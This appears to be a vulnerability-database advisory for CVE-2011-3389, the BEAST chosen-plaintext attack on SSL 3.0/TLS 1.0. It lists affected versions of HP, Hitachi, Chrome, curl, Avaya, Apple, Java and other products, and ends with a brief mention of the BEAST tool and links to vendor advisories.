HP System Management Homepage 2.1.8.179
HP System Management Homepage 2.1.6.156
HP System Management Homepage 2.1.5.146 B
HP System Management Homepage 2.1.5.146
HP System Management Homepage 2.1.4.143
HP System Management Homepage 2.1.2.127
HP System Management Homepage 2.1.15-210
HP System Management Homepage 2.1.14.20
HP System Management Homepage 2.1.12.201
HP System Management Homepage 2.1.11.197 A
HP System Management Homepage 2.1.10.186 C
HP System Management Homepage 2.1.10.186 B
HP System Management Homepage 2.1.10.186
HP System Management Homepage 2.1.0.121
HP System Management Homepage 2.0.2.106
HP System Management Homepage 2.0.1.104
HP System Management Homepage 0
HP NonStop Server J6.0.14.01
HP NonStop Server J06.16
HP NonStop Server J06.15.01
HP NonStop Server J06.15
HP NonStop Server J06.14.02
HP NonStop Server J06.14
HP NonStop Server J06.13.01
HP NonStop Server J06.13
HP NonStop Server J06.12.00
HP NonStop Server J06.11.01
HP NonStop Server J06.11.00
HP NonStop Server J06.10.02
HP NonStop Server J06.10.01
HP NonStop Server J06.10.00
HP NonStop Server J06.09.04
HP NonStop Server J06.09.03
HP NonStop Server J06.09.02
HP NonStop Server J06.09.01
HP NonStop Server J06.09.00
HP NonStop Server J06.08.04
HP NonStop Server J06.08.03
HP NonStop Server J06.08.02
HP NonStop Server J06.08.01
HP NonStop Server J06.08.00
HP NonStop Server J06.07.02
HP NonStop Server J06.07.01
HP NonStop Server J06.07.00
HP NonStop Server J06.06.03
HP NonStop Server J06.06.02
HP NonStop Server J06.06.01
HP NonStop Server J06.06.00
HP NonStop Server J06.05.02
HP NonStop Server J06.05.01
HP NonStop Server J06.05.00
HP NonStop Server J06.04.02
HP NonStop Server J06.04.01
HP NonStop Server J06.04.00
HP NonStop Server H06.27
HP NonStop Server H06.26.01
HP NonStop Server H06.26
HP NonStop Server H06.25.01
HP NonStop Server H06.25
HP NonStop Server H06.24.01
HP NonStop Server H06.24
HP NonStop Server H06.23
HP NonStop Server H06.22.01
HP NonStop Server H06.22.00
HP NonStop Server H06.21.02
HP NonStop Server H06.21.01
HP NonStop Server H06.21.00
HP NonStop Server H06.20.03
HP NonStop Server H06.20.02
HP NonStop Server H06.20.01
HP NonStop Server H06.20.00
HP NonStop Server H06.19.03
HP NonStop Server H06.19.02
HP NonStop Server H06.19.01
HP NonStop Server H06.19.00
HP NonStop Server H06.18.02
HP NonStop Server H06.18.01
HP NonStop Server H06.18.00
HP NonStop Server H06.17.03
HP NonStop Server H06.17.02
HP NonStop Server H06.17.01
HP NonStop Server H06.17.00
HP NonStop Server H06.16.02
HP NonStop Server H06.16.01
HP NonStop Server H06.16.00
HP NonStop Server H06.15.02
HP NonStop Server H06.15.01
HP NonStop Server H06.15.00
HP Network Node Manager i 9.1
HP HP-UX B.11.31
HP HP-UX B.11.11
Hitachi Web Server - Security Enhancement 0
Hitachi uCosminexus Service Platform - Messaging 0
Hitachi uCosminexus Service Platform 09-50 (Windows)
Hitachi uCosminexus Service Platform 09-50 (Windows(x64))
Hitachi uCosminexus Service Platform 09-50 (Linux)
Hitachi uCosminexus Service Platform 09-50 (HP-UX(IPF))
Hitachi uCosminexus Service Platform 09-50 (AIX)
Hitachi uCosminexus Service Platform 09-00 Windows (x64)
Hitachi uCosminexus Service Platform 09-00 Linux (x64)
Hitachi uCosminexus Service Platform 09-00 HP-UX (IPF)
Hitachi uCosminexus Service Platform 09-00 AIX (64)
Hitachi uCosminexus Service Platform 09-00 (Windows)
Hitachi uCosminexus Service Platform 0
Hitachi uCosminexus Service Architect 09-50 (Windows)
Hitachi uCosminexus Service Architect 09-50 (Windows(x64))
Hitachi uCosminexus Service Architect 09-50 (Linux)
Hitachi uCosminexus Service Architect 09-50 (HP-UX(IPF))
Hitachi uCosminexus Service Architect 09-50 (AIX)
Hitachi uCosminexus Service Architect 09-00 (Windows)
Hitachi uCosminexus Service Architect 09-00 (Windows(x64))
Hitachi uCosminexus Service Architect 09-00 (Linux)
Hitachi uCosminexus Service Architect 09-00 (HP-UX(IPF))
Hitachi uCosminexus Service Architect 09-00 (AIX)
Hitachi uCosminexus Service Architect 0
Hitachi uCosminexus Primary Server Base 09-50 (Windows)
Hitachi uCosminexus Primary Server Base 09-50 (Windows(x64))
Hitachi uCosminexus Primary Server Base 09-50 (Linux)
Hitachi uCosminexus Primary Server Base 09-50 (HP-UX(IPF))
Hitachi uCosminexus Primary Server Base 09-50 (AIX)
Hitachi uCosminexus Primary Server Base 09-00 (Windows)
Hitachi uCosminexus Primary Server Base 09-00 (Windows(x64))
Hitachi uCosminexus Primary Server Base 09-00 (Linux)
Hitachi uCosminexus Primary Server Base 09-00 (HP-UX(IPF))
Hitachi uCosminexus Primary Server Base 09-00 (AIX)
Hitachi uCosminexus Primary Server Base 0
Hitachi uCosminexus Operator for Service Platform 09-50 (Windows)
Hitachi uCosminexus Operator for Service Platform 09-50 (Windows(x64))
Hitachi uCosminexus Operator for Service Platform 09-50 (Linux)
Hitachi uCosminexus Operator for Service Platform 09-50 (HP-UX(IPF))
Hitachi uCosminexus Operator for Service Platform 09-50 (AIX)
Hitachi uCosminexus Operator for Service Platform 09-00 (Windows)
Hitachi uCosminexus Operator for Service Platform 09-00 (Windows(x64))
Hitachi uCosminexus Operator for Service Platform 09-00 (Linux)
Hitachi uCosminexus Operator for Service Platform 09-00 (HP-UX(IPF))
Hitachi uCosminexus Operator for Service Platform 09-00 (AIX)
Hitachi uCosminexus Operator 0
Hitachi uCosminexus Developer Standard 0
Hitachi uCosminexus Developer Professional for Plug-in 0
Hitachi uCosminexus Developer Professional 0
Hitachi uCosminexus Developer Light 0
Hitachi uCosminexus Developer 01 0
Hitachi uCosminexus Developer 09-50 (Windows)
Hitachi uCosminexus Developer 09-50 (Windows(x64))
Hitachi uCosminexus Developer 09-50 (Linux)
Hitachi uCosminexus Developer 09-50 (HP-UX(IPF))
Hitachi uCosminexus Developer 09-50 (AIX)
Hitachi uCosminexus Developer 09-00 HP-UX(IPF)
Hitachi uCosminexus Developer 09-00 (Windows(x64))
Hitachi uCosminexus Developer 09-00 (Linux)
Hitachi uCosminexus Developer 09-00 (AIX)
Hitachi uCosminexus Developer 09-00
Hitachi uCosminexus Client for Plug-in 0
Hitachi uCosminexus Client 09-50 (Windows)
Hitachi uCosminexus Client 09-50 (Windows(x64))
Hitachi uCosminexus Client 09-50 (Linux)
Hitachi uCosminexus Client 09-50 (HP-UX(IPF))
Hitachi uCosminexus Client 09-50 (AIX)
Hitachi uCosminexus Client 09-00 (Windows)
Hitachi uCosminexus Client 09-00 (Windows(x64))
Hitachi uCosminexus Client 09-00 (Linux)
Hitachi uCosminexus Client 09-00 (HP-UX(IPF))
Hitachi uCosminexus Client 09-00 (AIX)
Hitachi uCosminexus Client 0
Hitachi uCosminexus Application Server-r 09-50 (Windows)
Hitachi uCosminexus Application Server-r 09-50 (Windows(x64))
Hitachi uCosminexus Application Server-r 09-50 (Linux)
Hitachi uCosminexus Application Server-r 09-50 (HP-UX(IPF))
Hitachi uCosminexus Application Server-r 09-50 (AIX)
Hitachi uCosminexus Application Server-r 09-00 (Windows)
Hitachi uCosminexus Application Server-r 09-00 (Windows(x64))
Hitachi uCosminexus Application Server-r 09-00 (Linux)
Hitachi uCosminexus Application Server-r 09-00 (HP-UX(IPF))
Hitachi uCosminexus Application Server-r 09-00 (AIX)
Hitachi uCosminexus Application Server Standard-R 0
Hitachi uCosminexus Application Server Standard 0
Hitachi uCosminexus Application Server Smart Edition 0
Hitachi uCosminexus Application Server Light 0
Hitachi uCosminexus Application Server Express 09-70 (AIX)
Hitachi uCosminexus Application Server Enterprise 09-80 (Windows(x64))
Hitachi uCosminexus Application Server 09-50 (Windows(x64))
Hitachi uCosminexus Application Server 09-50 (Linux)
Hitachi uCosminexus Application Server 09-50 (HP-UX(IPF))
Hitachi uCosminexus Application Server 09-50 (AIX)
Hitachi uCosminexus Application Server 09-00
Hitachi Processing Kit for XML 0
Hitachi Hitachi Web Server 04-10-03 Windows (x64)
Hitachi Hitachi Web Server 04-10-01 Windows (x64)
Hitachi Hitachi Web Server 03-00-06 Windows 0
Hitachi Hitachi Web Server 04-10-03 Windows
Hitachi Hitachi Web Server 04-10-02 HP-UX (IPF)
Hitachi Hitachi Web Server 04-10-01 HP-UX (IPF)
Hitachi Hitachi Web Server 04-10 Windows
Hitachi Hitachi Web Server 04-00-05 Windows
Hitachi Hitachi Web Server 04-00-04 HP-UX (IPF)
Hitachi Hitachi Web Server 04-00-01 Solaris
Hitachi Hitachi Web Server 04-00 Windows
Hitachi Hitachi Web Server 04-00 Linux (IPF)
Hitachi Hitachi Web Server 04-00 Linux
Hitachi Hitachi Web Server 04-00 HP-UX (IPF)
Hitachi Hitachi Web Server 04-00 AIX
Hitachi Hitachi Web Server 03-10-10 Windows
Hitachi Hitachi Web Server 03-10-09 HP-UX (IPF)
Hitachi Hitachi Web Server 03-10 Windows
Hitachi Hitachi Web Server 03-10 HP-UX (IPF)
Hitachi Hitachi Web Server 03-00-05 HP-UX (IPF)
Hitachi Hitachi Web Server 03-00-02 (Windows)
Hitachi Hitachi Web Server 03-00-01 HP-UX
Hitachi Hitachi Web Server 03-00-01 (HP-UX(IPF)
Hitachi Hitachi Web Server 03-00 Windows
Hitachi Hitachi Web Server 03-00 Solaris
Hitachi Hitachi Web Server 03-00 Linux (IPF)
Hitachi Hitachi Web Server 03-00 Linux
Hitachi Hitachi Web Server 03-00 HP-UX (IPF)
Hitachi Hitachi Web Server 03-00 HP-UX
Hitachi Hitachi Web Server 03-00 AIX
Hitachi Hitachi Web Server 02-05 (Linux)
Hitachi Hitachi Web Server 02-04-/C (Windows)
Hitachi Hitachi Web Server 02-04-/B (Windows)
Hitachi Hitachi Web Server 02-04-/B (Linux(IPF)
Hitachi Hitachi Web Server 02-04-/A (Windows)
Hitachi Hitachi Web Server 02-04-/A (Windows(IP
Hitachi Hitachi Web Server 02-04-/A (Solaris)
Hitachi Hitachi Web Server 02-04-/A (Linux IPF)
Hitachi Hitachi Web Server 02-04-/A (HP-UX)
Hitachi Hitachi Web Server 02-04-/A (AIX)
Hitachi Hitachi Web Server 02-04 (Windows)
Hitachi Hitachi Web Server 02-04 (Linux)
Hitachi Hitachi Web Server 02-04 (HP-UX(IPF))
Hitachi Hitachi Web Server 02-03 (Windows)
Hitachi Hitachi Web Server 02-03 (Solaris)
Hitachi Hitachi Web Server 02-03 (Linux)
Hitachi Hitachi Web Server 02-03 (Linux IPF)
Hitachi Hitachi Web Server 02-03 (HP-UX)
Hitachi Hitachi Web Server 02-03 (HP-UX(IPF))
Hitachi Hitachi Web Server 02-03 (AIX)
Hitachi Hitachi Web Server 02-02 (Windows)
Hitachi Hitachi Web Server 02-02 (Solaris)
Hitachi Hitachi Web Server 02-02 (HP-UX)
Hitachi Hitachi Web Server 02-02 (AIX)
Hitachi Hitachi Web Server 02-01 (Windows)
Hitachi Hitachi Web Server 02-01 (Solaris)
Hitachi Hitachi Web Server 02-01 (HP-UX)
Hitachi Hitachi Web Server 02-01 (AIX)
Hitachi Hitachi Web Server 01-02-/D (AIX)
Hitachi Hitachi Web Server 01-02-/C (Solaris)
Hitachi Hitachi Web Server 01-02-/C (HP-UX)
Hitachi Hitachi Web Server 01-02-/C (AIX)
Hitachi Hitachi Web Server 01-02-/B (Solaris)
Hitachi Hitachi Web Server 01-02-/B (HP-UX)
Hitachi Hitachi Web Server 01-02-/B (AIX)
Hitachi Hitachi Web Server 01-02-/A (Solaris)
Hitachi Hitachi Web Server 01-02-/A (HP-UX)
Hitachi Hitachi Web Server 01-02-/A (AIX)
Hitachi Hitachi Web Server 01-02 (Solaris)
Hitachi Hitachi Web Server 01-02 (HP-UX)
Hitachi HiRDB for Java 0
Hitachi Cosminexus Studio - Web Edition 0
Hitachi Cosminexus Studio - Standard Edition 0
Hitachi Cosminexus Studio 0
Hitachi Cosminexus Server Web Edition 0
Hitachi Cosminexus Server Standard Edition 0
Hitachi Cosminexus Primary Server Base 0
Hitachi Cosminexus HTTP Server 09-00-10 Windows(x6)
Hitachi Cosminexus HTTP Server 09-00-10 Windows
Hitachi Cosminexus HTTP Server 09-00-10 Linux(x64)
Hitachi Cosminexus HTTP Server 09-00-10 HP-UX(IPF)
Hitachi Cosminexus HTTP Server 09-00-10 (AIX)
Hitachi Cosminexus HTTP Server 09-00 Windows(x64)
Hitachi Cosminexus HTTP Server 09-00 Windows
Hitachi Cosminexus HTTP Server 09-00 Linux(x64)
Hitachi Cosminexus HTTP Server 09-00 HP-UX(IPF)
Hitachi Cosminexus HTTP Server 09-00 (AIX)
Hitachi Cosminexus Developer Standard 0
Hitachi Cosminexus Developer Professional 0
Hitachi Cosminexus Developer no version 0
Hitachi Cosminexus Developer Light 0
Hitachi Cosminexus Developer 6.0
Hitachi Cosminexus Developer 5
Hitachi Cosminexus Client 0
Hitachi Cosminexus Application Server Standard 0
Hitachi Cosminexus Application Server no version 0
Hitachi Cosminexus Application Server Enterprise 0
Hitachi Cosminexus Application Server 6.0
Hitachi Cosminexus Application Server 5.0
Hitachi Cosminexus 9.0
Hitachi Cosminexus 8.0
Hitachi Cosminexus 7.0
Hitachi Cosminexus 6.0
Google Chrome 9.0.597.94
Google Chrome 9.0.597.84
Google Chrome 9.0.597.107
Google Chrome 8.0.552.344
Google Chrome 8.0.552.310
Google Chrome 8.0.552.309
Google Chrome 8.0.552.308
Google Chrome 8.0.552.307
Google Chrome 8.0.552.306
Google Chrome 8.0.552.305
Google Chrome 8.0.552.304
Google Chrome 8.0.552.303
Google Chrome 8.0.552.302
Google Chrome 8.0.552.301
Google Chrome 8.0.552.300
Google Chrome 8.0.552.237
Google Chrome 8.0.552.226
Google Chrome 8.0.552.225
Google Chrome 8.0.552.224
Google Chrome 8.0.552.223
Google Chrome 8.0.552.222
Google Chrome 8.0.552.221
Google Chrome 8.0.552.220
Google Chrome 8.0.552.219
Google Chrome 8.0.552.218
Google Chrome 8.0.552.217
Google Chrome 8.0.552.216
Google Chrome 8.0.552.215
Google Chrome 8.0.552.214
Google Chrome 8.0.552.213
Google Chrome 8.0.552.212
Google Chrome 8.0.552.211
Google Chrome 8.0.552.210
Google Chrome 8.0.552.21
Google Chrome 8.0.552.209
Google Chrome 8.0.552.208
Google Chrome 8.0.552.207
Google Chrome 8.0.552.206
Google Chrome 8.0.552.205
Google Chrome 8.0.552.204
Google Chrome 8.0.552.203
Google Chrome 8.0.552.202
Google Chrome 8.0.552.201
Google Chrome 8.0.552.200
Google Chrome 8.0.552.20
Google Chrome 8.0.552.2
Google Chrome 8.0.552.19
Google Chrome 8.0.552.18
Google Chrome 8.0.552.17
Google Chrome 8.0.552.16
Google Chrome 8.0.552.15
Google Chrome 8.0.552.14
Google Chrome 8.0.552.13
Google Chrome 8.0.552.12
Google Chrome 8.0.552.11
Google Chrome 8.0.552.105
Google Chrome 8.0.552.104
Google Chrome 8.0.552.103
Google Chrome 8.0.552.102
Google Chrome 8.0.552.101
Google Chrome 8.0.552.100
Google Chrome 8.0.552.10
Google Chrome 8.0.552.1
Google Chrome 8.0.552.0
Google Chrome 8.0.551.1
Google Chrome 8.0.551.0
Google Chrome 8.0.550.0
Google Chrome 8.0.549.0
Google Chrome 14.0.835.186
Google Chrome 14.0.835.163
Google Chrome 14
Google Chrome 13.0.782.215
Google Chrome 13.0.782.112
Google Chrome 13.0.782.107
Google Chrome 13
Google Chrome 12.0.742.91
Google Chrome 12.0.742.112
Google Chrome 12.0.742.100
Google Chrome 12
Google Chrome 11.0.696.77
Google Chrome 11.0.696.71
Google Chrome 11.0.696.68
Google Chrome 11.0.696.65
Google Chrome 11.0.696.57
Google Chrome 11.0.696.43
Google Chrome 11.0.672.2
Google Chrome 11
Google Chrome 10.0.648.205
Google Chrome 10.0.648.204
Google Chrome 10.0.648.133
Google Chrome 10.0.648.128
Google Chrome 10.0.648.127
Google Chrome 10
Gentoo Linux
EMC VPLEX GeoSynchrony 5.2.1
EMC VPLEX GeoSynchrony 5.2 SP1
EMC VPLEX GeoSynchrony 4.0
EMC RSA BSAFE SSL-J 6.0
EMC RSA BSAFE SSL-J 5.1.1
EMC RSA BSAFE SSL-C 2.8.5
EMC RSA BSAFE Micro Edition Suite 4.0.3
EMC RSA BSAFE Micro Edition Suite 4.0.2
EMC RSA BSAFE Micro Edition Suite 3.2.5
EMC RSA BSAFE Micro Edition Suite 3.2.4
EMC RSA BSAFE Micro Edition Suite 4.0
EMC RSA BSAFE Micro Edition Suite 3.2
EMC RSA BSAFE Micro Edition Suite 3.1
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
Daniel Stenberg curl 7.20
Daniel Stenberg curl 7.19.6
Daniel Stenberg curl 7.19.5
Daniel Stenberg curl 7.19.4
Daniel Stenberg curl 7.19.3
Daniel Stenberg curl 7.19
Daniel Stenberg curl 7.18.1
Daniel Stenberg curl 7.18
Daniel Stenberg curl 7.17
Daniel Stenberg curl 7.16.4
Daniel Stenberg curl 7.15.5
Daniel Stenberg curl 7.15.3
Daniel Stenberg curl 7.15.2
Daniel Stenberg curl 7.15.1
Daniel Stenberg curl 7.15
Daniel Stenberg curl 7.14.1
Daniel Stenberg curl 7.14
Daniel Stenberg curl 7.13.2
Daniel Stenberg curl 7.13.1
Daniel Stenberg curl 7.13
Daniel Stenberg curl 7.12.3
Daniel Stenberg curl 7.12.2
Daniel Stenberg curl 7.12.1
Daniel Stenberg curl 7.12
Daniel Stenberg curl 7.11.2
Daniel Stenberg curl 7.11.1
Daniel Stenberg curl 7.11
Daniel Stenberg curl 7.10.8
Daniel Stenberg curl 7.10.7
Daniel Stenberg curl 7.10.6
Daniel Stenberg curl 7.2.1
Daniel Stenberg curl 7.2
Daniel Stenberg curl 7.23.1
Daniel Stenberg curl 7.21.7
Daniel Stenberg curl 7.21.6
Daniel Stenberg curl 7.20.2
Daniel Stenberg curl 7.20.1
Daniel Stenberg curl 7.16.3
Collax Collax Groupware Suite 5.5.11
Collax Collax Business Server 5.5.11
Avaya Voice Portal 5.1.2
Avaya Voice Portal 5.1.1
Avaya Voice Portal 5.1 SP1
Avaya Voice Portal 5.1
Avaya Voice Portal 5.0 SP2
Avaya Voice Portal 5.0 SP1
Avaya Voice Portal 5.0
Avaya Voice Portal 4.1 SP2
Avaya Voice Portal 4.1 SP1
Avaya Voice Portal 4.1
Avaya Voice Portal 4.0
Avaya Proactive Contact 4.1.2
Avaya Proactive Contact 4.1.1
Avaya Proactive Contact 5.0
Avaya Proactive Contact 4.2.2
Avaya Proactive Contact 4.2.1
Avaya Proactive Contact 4.2
Avaya Proactive Contact 4.1
Avaya Proactive Contact 4.0.1
Avaya Proactive Contact 4.0
Avaya Messaging Storage Server 5.2.8
Avaya Messaging Storage Server 5.2.2
Avaya Messaging Storage Server 5.2 SP3
Avaya Messaging Storage Server 5.2 SP2
Avaya Messaging Storage Server 5.2 SP1
Avaya Messaging Storage Server 5.2
Avaya Messaging Application Server 5.2
Avaya Messaging Application Server 5
Avaya Messaging Application Server 4
Avaya Message Networking 5.2.1
Avaya Message Networking 5.2.4
Avaya Message Networking 5.2.3
Avaya Message Networking 5.2.2
Avaya Message Networking 5.2 SP1
Avaya Message Networking 5.2
Avaya Meeting Exchange - Webportal 6.0
Avaya Meeting Exchange - Web Conferencing Server 0
Avaya Meeting Exchange - Streaming Server 0
Avaya Meeting Exchange - Recording Server 0
Avaya Meeting Exchange - Client Registration Server 0
Avaya Meeting Exchange 5.0 .0.52
Avaya Meeting Exchange 5.2 SP2
Avaya Meeting Exchange 5.2 SP1
Avaya Meeting Exchange 5.2
Avaya Meeting Exchange 5.1 SP1
Avaya Meeting Exchange 5.1
Avaya Meeting Exchange 5.0 SP2
Avaya Meeting Exchange 5.0 SP1
Avaya Meeting Exchange 5.0
Avaya IR 4.0
Avaya IQ 5.2
Avaya IQ 5.1.1
Avaya IQ 5.1
Avaya IQ 5
Avaya IP Office Application Server 7.0
Avaya IP Office Application Server 6.1
Avaya IP Office Application Server 6.0
Avaya Interactive Response 4.0
Avaya Communication Server 1000 Telephony Manager 4.0
Avaya Communication Server 1000 Telephony Manager 3.0
Avaya CMS Server 16.2
Avaya CMS Server 16.1
Avaya CMS Server 16.0
Avaya CMS Server 15.0 AUX
Avaya CMS Server 15.0
Avaya CallPilot 5.0
Avaya CallPilot 4.0
Avaya Aura System Platform 6.0.2
Avaya Aura System Platform 6.0.1
Avaya Aura System Platform 6.0 SP3
Avaya Aura System Platform 6.0 SP2
Avaya Aura System Platform 6.0
Avaya Aura System Platform 1.0
Avaya Aura System Manager 6.1.3
Avaya Aura System Manager 6.1.2
Avaya Aura System Manager 6.1.1
Avaya Aura System Manager 6.1 SP2
Avaya Aura System Manager 6.1 Sp1
Avaya Aura System Manager 6.1
Avaya Aura SIP Enablement Services 5.2.1
Avaya Aura SIP Enablement Services 5.2
Avaya Aura SIP Enablement Services 5.1
Avaya Aura SIP Enablement Services 5.0
Avaya Aura SIP Enablement Services 4.0
Avaya Aura Session Manager 6.1.3
Avaya Aura Session Manager 6.1.2
Avaya Aura Session Manager 6.1.1
Avaya Aura Session Manager 6.1 SP2
Avaya Aura Session Manager 6.1 Sp1
Avaya Aura Session Manager 6.1
Avaya Aura Session Manager 6.0 SP1
Avaya Aura Session Manager 6.0
Avaya Aura Session Manager 5.2
Avaya Aura Session Manager 1.1
Avaya Aura Presence Services 6.1.1
Avaya Aura Presence Services 6.1
Avaya Aura Presence Services 6.0
Avaya Aura Messaging 6.0.1
Avaya Aura Messaging 6.0
Avaya Aura Experience Portal 6.0
Avaya Aura Conferencing 6.0 Standard
Avaya Aura Communication Manager Utility Services 6.1
Avaya Aura Communication Manager Utility Services 6.0
Avaya Aura Communication Manager 5.2
Avaya Aura Communication Manager 5.1
Avaya Aura Communication Manager 4.0
Avaya Aura Application Server 5300 SIP Core 2.0
Avaya Aura Application Enablement Services 5.2.1
Avaya Aura Application Enablement Services 6.1.1
Avaya Aura Application Enablement Services 6.1
Avaya Aura Application Enablement Services 5.2.3
Avaya Aura Application Enablement Services 5.2.2
Avaya Aura Application Enablement Services 5.2
Apple Xcode 4.3
Apple Mac OS X Server 10.7.5
Apple Mac OS X Server 10.6.6
Apple Mac OS X Server 10.6.5
Apple Mac OS X Server 10.6.4
Apple Mac OS X Server 10.6.3
Apple Mac OS X Server 10.6.2
Apple Mac OS X Server 10.6.1
Apple Mac OS X Server 10.7.3
Apple Mac OS X Server 10.7.2
Apple Mac OS X Server 10.7.1
Apple Mac OS X Server 10.7
Apple Mac OS X Server 10.6.8
Apple Mac OS X Server 10.6.7
Apple Mac OS X Server 10.6
Apple Mac OS X 10.8.5
Apple Mac OS X 10.6.6
Apple Mac OS X 10.6.5
Apple Mac OS X 10.6.4
Apple Mac OS X 10.6.3
Apple Mac OS X 10.6.2
Apple Mac OS X 10.6.1
Apple Mac OS X 10.7.4
Apple Mac OS X 10.7.3
Apple Mac OS X 10.7.2
Apple Mac OS X 10.7.1
Apple Mac OS X 10.7
Apple Mac OS X 10.6.8
Apple Mac OS X 10.6.7
Apple Mac OS X 10.6
Apple iPod Touch 0
Apple iPhone 0
Apple iPad 0
Apple iOS 4.2.1
Apple iOS 4.0.2
Apple iOS 4.0.1
Apple iOS 4.3.5
Apple iOS 4.3.4
Apple iOS 4.3.3
Apple iOS 4.3.2
Apple iOS 4.3.1
Apple iOS 4.3
Apple iOS 4.2.9
Apple iOS 4.2.8
Apple iOS 4.2.7
Apple iOS 4.2.6
Apple iOS 4.2.5
Apple iOS 4.2.10
Apple iOS 4.2 beta
Apple iOS 4.2
Apple iOS 4.1
Apple iOS 4
Apple Apple TV 4.3
Apple Apple TV 4.2
Apple Apple TV 4.1
Apple Apple TV 4.0
Apple Apple TV 2.1
Apple Apple TV 1.0
VMWare Update Manager 5.0 Update 1
Sun JRE (Windows Production Release) 1.5.0_32
Sun JRE (Solaris Production Release) 1.5.0_32
Sun JRE (Linux Production Release) 1.5.0_32
Sun JDK (Windows Production Release) 1.5.0_32
Sun JDK (Solaris Production Release) 1.5.0_32
Sun JDK (Linux Production Release) 1.5.0_32
Siemens SIMATIC RF68XR 3.2.1
Siemens SIMATIC RF615R 3.2.1
PeerSec Networks MatrixSSL 3.2.2
Oracle JRE (Windows Production Release) 1.6.0_28
Oracle JRE (Solaris Production Release) 1.6.0_28
Oracle JRE (Linux Production Release) 1.6.0_28
Oracle JDK (Windows Production Release) 1.6.0_28
Oracle JDK (Solaris Production Release) 1.6.0_28
Oracle JDK (Linux Production Release) 1.6.0_28
Opera Software Opera Web Browser 11.60
Opera Software Opera Web Browser 11.51
Kerio Kerio Connect 8.1
IBM Security AppScan Standard 8.6
IBM OpenPages GRC Platform 6.2.1
IBM Java SE 7 SR1
IBM Java SE 6 SR10
IBM Java SE 1.4.2 SR13-FP11
IBM Java SDK 6 SR10
IBM Java SDK 1.4.2 SR13 FP11
HP System Management Homepage 7.2.1
Hitachi Cosminexus HTTP Server 09-00-13 HP-UX(IPF)
Hitachi Cosminexus HTTP Server 09-00-13 (AIX)
Hitachi Cosminexus HTTP Server 09-00-12 Windows
Hitachi Cosminexus HTTP Server 09-00-12 Linux(x64)
Hitachi Cosminexus HTTP Server 09-00-11 Windows(x6)
Hitachi Cosminexus Developer's Kit for Java(TM) 09-50-01 (Windows(x8
Hitachi Cosminexus Developer's Kit for Java(TM) 09-50-01 (Windows(x6
Hitachi Cosminexus Developer's Kit for Java(TM) 09-50-01 (Linux(x64)
Hitachi Cosminexus Developer's Kit for Java(TM) 09-00-06 (Windows(x8
Hitachi Cosminexus Developer's Kit for Java(TM) 09-00-06 (Windows(x6
Hitachi Cosminexus Developer's Kit for Java(TM) 09-00-06 (Linux(x64)
EMC VPLEX GeoSynchrony 5.3
EMC RSA BSAFE SSL-J 6.0.1
EMC RSA BSAFE SSL-J 5.1.2
EMC RSA BSAFE SSL-C 2.8.6
EMC RSA BSAFE Micro Edition Suite (MES) 4.0.5
EMC RSA BSAFE Micro Edition Suite 3.2.6
Daniel Stenberg curl 7.24.0
Collax Collax Groupware Suite 5.5.12
Collax Collax Business Server 5.5.12
Apple Xcode 4.4
Apple Mac OS X Server 10.7.4
Apple Mac OS X Server 10.7.3
Apple Mac OS X 10.8.2
Apple Mac OS X 10.7.5
Apple Mac OS X 10.9.2
Apple Mac OS X 10.9
Apple Mac OS X 10.7.4
Apple Mac OS X 10.7.3
Apple iOS 5
Apple Apple TV 4.4
Exploit
An exploit tool called BEAST (Browser Exploit Against SSL/TLS) has been developed by Thai Duong and Juliano Rizzo. Please see the references for more information.
References:
- Bug 665814 - (CVE-2011-3389) Rizzo/Duong chosen plaintext attack on SSL/TLS 1.0 (Mozilla)
- Collax Business Server 5.5.12 (Collax)
- Collax Business Server Homepage (Collax)
- Collax Groupware Suite 5.5.12 (Collax)
- Collax Groupware Suite Homepage (Collax)
- Configuring IBM Websphere DataPower appliance to close CVE-2011-3389 (BEAST) SSL (IBM)
- CVE-2011-3389 Chosen-plaintext attack against SSL/TLS in GlassFish (Oracle)
- ESA-2012-032: RSA BSAFE® Micro Edition Suite Security Update for BEAST (Browser (EMC)
- ESA-2014-016: EMC VPLEX Multiple Vulnerabilities (EMC)
- Hackers break SSL encryption used by millions of sites (The Register)
- IBM Java Update Oracle February 14 2012 CPU (IBM)
- IBM Lotus Domino remedy for BEAST Secure Socket Layer (SSL) 3.0 exploit recently (IBM)
- Kerio Connect Release History (Kerio)
- MatrixSSL Homepage (MatrixSSL)
- Microsoft releases Security Advisory 2588513 (Microsoft)
- Multiple vulnerabilities in Python (Oracle)
- Novell Access Manager and CVE-2011-3389: Beast Attack Vulnerability (Novell)
- Opera 11.51 Security Advisory (Opera Software)
- Opera 11.60 for Windows changelog (Opera Software)
- Oracle Critical Patch Updates (CPUs) and Synchronized Security Releases (SSRs) (IBM)
- PM60958: GEN APAR: 31-BIT JAVA FOR Z/OS SDK 5 SERVICE REFRESH (SR13 FP1) THE PTF (IBM)
- Security Bulletin: IBM System x and Flex Systems Browser Exploit Against SSL/TLS (IBM)
- SSL 3.0 Protocol Specifications (IETF)
- ssl-tls-info-disclosure (70069) (IBM)
- TLS Protocol Version 1.0 Specifications (IETF)
- Update to version 1.4.2 SR13 FP11 and 6 SR10 (IBM)
- ESA-2012-029: RSA BSAFE(r) SSL-C Multiple Vulnerabilities (Security Alert)
- [security bulletin] HPSBMU02900 rev.3 - HP System Management Homepage (SMH) runn (HP)
- A weakness in the SSL v3.0 and TLS 1.0 specifications can allow eavesdropping at (Opera Software)
- About the security content of Xcode 4.4 (Apple)
- ASA-2011-334 java-1.6.0-openjdk security update (RHSA-2011-1380) (Avaya)
- ASA-2011-335 java-1.6.0-sun security update (RHSA-2011-1384) (Avaya)
- ASA-2011-364 Oracle Java Critical Update Combined CVEs (October 2011) (Avaya)
- ASA-2012-018 MS12-006 Vulnerability in SSL/TLS Could Allow Information Disclosur (Avaya)
- curl SSL CBC IV vulnerability (curl)
- ESA-2013-039: RSA BSAFE SSL-J Multiple Vulnerabilities (BugTraq)
- HPSBMU02797 SSRT100867 rev.1 (HP)
- HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Win (HP)
- HPSBNS02920 rev.1 - HP NonStop Servers Multiple Remote Vulnerabilities (HP)
- HPSBUX02760 SSRT100805 rev.1 - HP-UX Running Java, Remote Unauthorized Access, D (HP)
- HS11-024 Multiple vulnerabilities have been found in Cosminexus (Hitachi)
- IBM System x and Flex Systems OpenSSH Vulnerabilities (IBM)
- ICS Advisory (ICSA-19-192-04) (ICS CERT)
